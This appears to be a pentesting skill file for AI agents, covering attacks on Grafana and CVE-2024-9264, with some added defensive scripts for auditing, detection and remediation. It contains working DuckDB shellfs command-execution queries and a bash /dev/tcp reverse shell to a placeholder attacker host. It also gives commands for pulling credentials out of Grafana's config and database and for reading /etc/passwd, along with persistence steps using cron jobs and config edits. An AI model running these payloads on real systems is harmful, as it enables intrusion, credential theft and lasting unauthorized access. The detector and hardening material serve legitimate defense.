Hacktricks-skills grafana-pentest

Pentest Grafana instances for misconfigurations and the CVE-2024-9264 SQL Expressions RCE/LFI vulnerability. Use this skill whenever you need to assess Grafana security, check for exposed credentials in config files, enumerate data sources, or test for CVE-2024-9264, which allows authenticated users to execute arbitrary commands via the DuckDB shellfs extension. Trigger this skill for any Grafana security assessment, penetration test, or vulnerability scan.

Install: clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
Manifest: skills/network-services-pentesting/pentesting-web/grafana/SKILL.MD

Grafana Pentesting Skill

A comprehensive guide for security assessment of Grafana instances, including configuration analysis, credential discovery, and CVE-2024-9264 exploitation.

⚠️ Authorization Required

Only use these techniques on systems you own or have explicit written authorization to test. Unauthorized access is illegal.

Quick Start

# Check if target is vulnerable to CVE-2024-9264
python3 scripts/check_grafana_cve.py -u <user> -p <pass> http://grafana.target

# Execute command if vulnerable
python3 scripts/exploit_cve_2024_9264.py -u <user> -p <pass> -c "id" http://grafana.target

1. Configuration File Analysis

Sensitive Information Locations

Check these files for exposed credentials and configuration:

| File Path                      | Contains                                   |
|--------------------------------|--------------------------------------------|
| /etc/grafana/grafana.ini       | Admin username, password, database config  |
| /var/lib/grafana/grafana.db    | SQLite3 database with data sources         |
| /etc/grafana/provisioning/     | Provisioned data source configs            |

Extract Credentials from Config

# Read main config file
grep -E "(admin_user|admin_password|password)" /etc/grafana/grafana.ini

# Query SQLite database for data source credentials
sqlite3 /var/lib/grafana/grafana.db "SELECT user, password, database FROM data_source;"

# Check for API keys in database
sqlite3 /var/lib/grafana/grafana.db "SELECT * FROM api_key;"

2. CVE-2024-9264 SQL Expressions RCE/LFI

Vulnerability Overview

Grafana's experimental SQL Expressions feature (enabled via expressions.enabled = true) allows authenticated users to execute arbitrary commands through DuckDB's shellfs extension.

Impact:

  • Code execution as the Grafana OS user (often grafana, sometimes root in containers)
  • Local file read (LFI) capabilities
  • Works with VIEWER role or higher

Prerequisites Check

Before attempting exploitation, verify:

  1. SQL Expressions enabled:

    curl -u <user>:<pass> http://grafana.target/api/admin/settings | jq '.expressions.enabled'
    
  2. DuckDB binary present on server:

    # This check happens during exploitation attempt
    # If duckdb is not in PATH, exploit will fail
    
  3. Authentication credentials:

    • Any user with VIEWER role or higher
    • Admin credentials provide more options
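Both the configuration-file review in section 1 and the prerequisites check above come down to the same question: does this instance hold plaintext credentials, and is SQL Expressions switched on? The following audit script is an added example, not part of the hacktricks-skills repo or of Grafana. It works offline on a grafana.ini body and on a /api/admin/settings response body you have already retrieved, using the `[expressions] enabled` key named on this page; the sample inputs are constructed, and the assumption that Grafana returns settings values as strings ("true") is handled alongside real booleans.

```python
"""Audit a grafana.ini body and a /api/admin/settings body for the risk
indicators this skill checks for (added example; sample inputs constructed)."""
import configparser
import json

# Constructed sample of a grafana.ini with the weaknesses the skill looks for.
SAMPLE_INI = """\
[security]
admin_user = admin
admin_password = admin

[database]
type = mysql
user = grafana
password = s3cr3t

[expressions]
enabled = true
"""

# Constructed sample of a GET /api/admin/settings body. Values are assumed to
# come back as strings, so "true" (not only True) must count as enabled.
SAMPLE_SETTINGS = json.dumps({
    "expressions": {"enabled": "true"},
    "security": {"admin_user": "admin"},
})


def audit_ini(ini_text: str) -> list:
    """Return (severity, message) findings for a grafana.ini body."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(ini_text)
    findings = []
    for section in cfg.sections():
        for key, value in cfg.items(section):
            # Any populated *password* key is a plaintext credential on disk.
            if "password" in key and value.strip():
                severity = "high" if section == "security" else "medium"
                findings.append((severity, f"[{section}] {key} stored in plaintext"))
    # "admin" is the value Grafana ships in its default configuration.
    if cfg.get("security", "admin_password", fallback="") == "admin":
        findings.append(("high", "[security] admin_password is Grafana's shipped default"))
    if cfg.getboolean("expressions", "enabled", fallback=False):
        findings.append(("critical", "[expressions] enabled = true: SQL Expressions on (CVE-2024-9264 precondition)"))
    return findings


def sql_expressions_enabled(settings_json: str) -> bool:
    """Evaluate the same flag the skill's curl | jq '.expressions.enabled' check reads."""
    settings = json.loads(settings_json)
    value = settings.get("expressions", {}).get("enabled", "false")
    if isinstance(value, bool):
        return value
    return str(value).strip().lower() == "true"


if __name__ == "__main__":
    for sev, msg in audit_ini(SAMPLE_INI):
        print(f"{sev:9}{msg}")
    print("SQL Expressions enabled via API:", sql_expressions_enabled(SAMPLE_SETTINGS))
```

A "critical" finding from audit_ini or a True from sql_expressions_enabled means the remediation in section 5 applies regardless of whether the exploit script succeeds, since DuckDB may simply be absent today and installed later.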

Manual Exploitation

Step 1: Install and Load Shellfs Extension

Execute this SQL query in Grafana's SQL Expressions interface:

SELECT 1; INSTALL shellfs FROM community; LOAD shellfs;
SELECT * FROM read_csv('CMD >/tmp/grafana_cmd_output 2>&1 |');

Replace CMD with your desired command.

Step 2: Read Command Output

SELECT content FROM read_blob('/tmp/grafana_cmd_output');
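The two-step query pattern above (install/load shellfs, read_csv with a trailing shell pipe, then read_blob of the scratch file) is also what a defender should be alerting on. The detector below is an added example, not from the hacktricks-skills repo or from Grafana: it applies those signatures to a list of SQL Expression query strings, such as request bodies captured at a reverse proxy in front of Grafana or query text from Grafana's logs. The sample queries are constructed, with the command replaced by the page's CMD placeholder.

```python
"""Flag CVE-2024-9264-style SQL Expression queries (added example; sample
queries constructed, the command itself left as the CMD placeholder)."""
import re

# (rule name, pattern). Matching is case-insensitive because SQL keywords are.
RULES = [
    ("shellfs_load", re.compile(r"\b(INSTALL|LOAD)\s+shellfs\b", re.IGNORECASE)),
    # read_csv whose path argument ends in '|': DuckDB shellfs treats it as a command pipe.
    ("read_csv_pipe", re.compile(r"read_csv\s*\(\s*'[^']*\|\s*'\s*\)", re.IGNORECASE)),
    # read_blob of a local path: the file-read half of the technique (LFI).
    ("read_blob_file", re.compile(r"read_blob\s*\(\s*'[^']+'\s*\)", re.IGNORECASE)),
]

SAMPLE_QUERIES = [
    # benign SQL Expressions usage
    "SELECT time, avg(value) FROM A GROUP BY time",
    "SELECT * FROM B WHERE host = 'web-01'",
    # the two-step pattern shown on this page
    "SELECT 1; INSTALL shellfs FROM community; LOAD shellfs; "
    "SELECT * FROM read_csv('CMD >/tmp/grafana_cmd_output 2>&1 |');",
    "SELECT content FROM read_blob('/tmp/grafana_cmd_output');",
]


def scan_query(query: str) -> list:
    """Return the names of every rule that matches a single query string."""
    return [name for name, pattern in RULES if pattern.search(query)]


def severity(rule_names: list) -> str:
    """Command execution indicators outrank the file-read indicator."""
    if "shellfs_load" in rule_names or "read_csv_pipe" in rule_names:
        return "critical"
    if rule_names:
        return "high"
    return "none"


def scan_queries(queries: list) -> list:
    """Return (index, matched rules, severity) for each query that triggers a rule."""
    hits = []
    for i, q in enumerate(queries):
        matched = scan_query(q)
        if matched:
            hits.append((i, matched, severity(matched)))
    return hits


if __name__ == "__main__":
    for idx, rules, sev in scan_queries(SAMPLE_QUERIES):
        print(f"query {idx}: {sev:8} {', '.join(rules)}")
```

A read_blob hit on its own is worth a look but can occur in legitimate DuckDB use; shellfs_load or read_csv_pipe from any Grafana user, including a VIEWER, is the pattern to page on.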

Reverse Shell Payload

# Command to embed in the SQL query
bash -c "bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1"

# Listener on attacker machine
nc -lnvp 443

Automated Exploitation

Use the provided script for reliable exploitation:

# Check execution context and privileges
python3 scripts/exploit_cve_2024_9264.py -u <USER> -p <PASS> -c id http://grafana.target

# Launch reverse shell
python3 scripts/exploit_cve_2024_9264.py -u <USER> -p <PASS> \
  -c 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1"' \
  http://grafana.target

# Read arbitrary file (LFI)
python3 scripts/exploit_cve_2024_9264.py -u <USER> -p <PASS> \
  -c 'cat /etc/passwd' \
  http://grafana.target

Output interpretation:

  • uid=0(root) indicates Grafana runs as root (common in containers)
  • uid=471(grafana) indicates the standard Grafana user

3. Enumeration and Discovery

Check Installed Plugins

# Via API
curl -u <user>:<pass> http://grafana.target/api/plugins

# Via UI: Admin → Plugins

Enumerate Data Sources

curl -u <user>:<pass> http://grafana.target/api/datasources

Check for API Keys

# Admin only: list API keys
curl -u <admin>:<pass> http://grafana.target/api/auth/keys

# Admin only: LDAP status
curl -u <admin>:<pass> http://grafana.target/api/admin/ldap

Invite Users (if admin)

# POST to /api/admin/users with user data
# Or use UI: Admin → Users → Invite User

4. Post-Exploitation

Privilege Escalation Checks

If you gain shell access:

# Check current user and groups
id

# Check for sudo privileges
sudo -l

# Check for other services running as root
ps aux | grep root

# Check for cron jobs
cat /etc/crontab
ls -la /etc/cron.*

Persistence Options

# Add reverse shell to Grafana startup (if you have write access)
echo 'YOUR_PAYLOAD' >> /etc/grafana/grafana.ini

# Create cron job
echo '* * * * * /path/to/payload' | crontab -

5. Mitigation and Remediation

For CVE-2024-9264

  1. Disable SQL Expressions:

    # In /etc/grafana/grafana.ini
    [expressions]
    enabled = false
    
  2. Update Grafana:

    • Upgrade to patched version (check Grafana security advisories)
  3. Remove DuckDB:

    # If not needed for other purposes
    apt remove duckdb
    
  4. Restrict User Permissions:

    • Use principle of least privilege
    • Avoid giving VIEWER role to untrusted users

General Hardening

  1. Secure Configuration Files:

    chmod 600 /etc/grafana/grafana.ini
    chown grafana:grafana /etc/grafana/grafana.ini
    
  2. Use Strong Authentication:

    • Enable LDAP/SSO
    • Use strong passwords
    • Enable 2FA if available
  3. Network Segmentation:

    • Restrict access to Grafana
    • Use firewall rules
    • Consider reverse proxy with authentication
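The CVE-2024-9264 remediation list and the "Secure Configuration Files" step above are a small procedure: force `enabled = false` under `[expressions]`, tighten the file mode, and confirm DuckDB is gone. The script below is an added example, not tooling from Grafana or the hacktricks-skills repo. It edits grafana.ini line by line so comments and other sections survive (a configparser round-trip would drop them), applies the chmod 600 step, and reports whether a `duckdb` binary is still on PATH; the config in self_check() is constructed and written to a temporary directory, and the owner change (chown grafana:grafana) is left to the shell command on the page.

```python
"""Apply the CVE-2024-9264 remediation steps to a grafana.ini (added example;
the sample config used by self_check() is constructed)."""
import os
import re
import shutil
import stat
import tempfile

SECTION_RE = re.compile(r"^\s*\[([^\]]+)\]\s*$")
# Matches an active or commented-out `enabled =` line so ';enabled = true' is replaced too.
ENABLED_RE = re.compile(r"^\s*[;#]?\s*enabled\s*=", re.IGNORECASE)


def disable_sql_expressions(ini_text: str) -> str:
    """Return ini_text with [expressions] enabled = false, adding the section if absent."""
    out, section, handled = [], None, False
    for line in ini_text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            # Leaving [expressions] without having seen `enabled`: add it before the next section.
            if section == "expressions" and not handled:
                out.append("enabled = false")
                handled = True
            section = m.group(1).strip().lower()
        elif section == "expressions" and ENABLED_RE.match(line):
            line = "enabled = false"
            handled = True
        out.append(line)
    if not handled:
        if section != "expressions":
            out.extend(["", "[expressions]"])
        out.append("enabled = false")
    return "\n".join(out) + "\n"


def ini_mode_is_private(path: str) -> bool:
    """True when group and other have no permission bits (the chmod 600 step)."""
    return stat.S_IMODE(os.stat(path).st_mode) & 0o077 == 0


def restrict_ini_mode(path: str) -> None:
    os.chmod(path, 0o600)


def duckdb_on_path() -> bool:
    """The 'Remove DuckDB' step: report whether the binary is still reachable."""
    return shutil.which("duckdb") is not None


def self_check() -> dict:
    """Run the remediation on a constructed config in a temp dir and return what was observed."""
    sample = (
        "[security]\nadmin_user = admin\n\n"
        "[expressions]\n; experimental\nenabled = true\n\n"
        "[log]\nlevel = info\n"
    )
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "grafana.ini")
        with open(path, "w") as f:
            f.write(sample)
        os.chmod(path, 0o644)                 # the typical too-open starting state
        before = ini_mode_is_private(path)
        with open(path) as f:
            hardened = disable_sql_expressions(f.read())
        with open(path, "w") as f:
            f.write(hardened)
        restrict_ini_mode(path)
        after = ini_mode_is_private(path)
    return {"mode_private_before": before, "mode_private_after": after, "hardened": hardened}


if __name__ == "__main__":
    result = self_check()
    print(result["hardened"])
    print("mode private before/after:", result["mode_private_before"], result["mode_private_after"])
    print("duckdb still on PATH:", duckdb_on_path())
```

Run it against the real file with the Grafana service stopped, then restart Grafana and re-check /api/admin/settings as in the prerequisites section; a config edit that is never reloaded leaves the instance as exploitable as before.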

6. Testing Checklist

  • Check /etc/grafana/grafana.ini for credentials
  • Query SQLite database for data source credentials
  • Verify SQL Expressions status via API
  • Test CVE-2024-9264 with automated script
  • Enumerate installed plugins
  • Check for exposed API keys
  • Attempt privilege escalation if shell access gained
  • Document findings and remediation steps

References

Notes

  • This skill is designed for authorized security assessments only
  • Always obtain written authorization before testing
  • Document all findings and share with system owners
  • Follow responsible disclosure practices for vulnerabilities found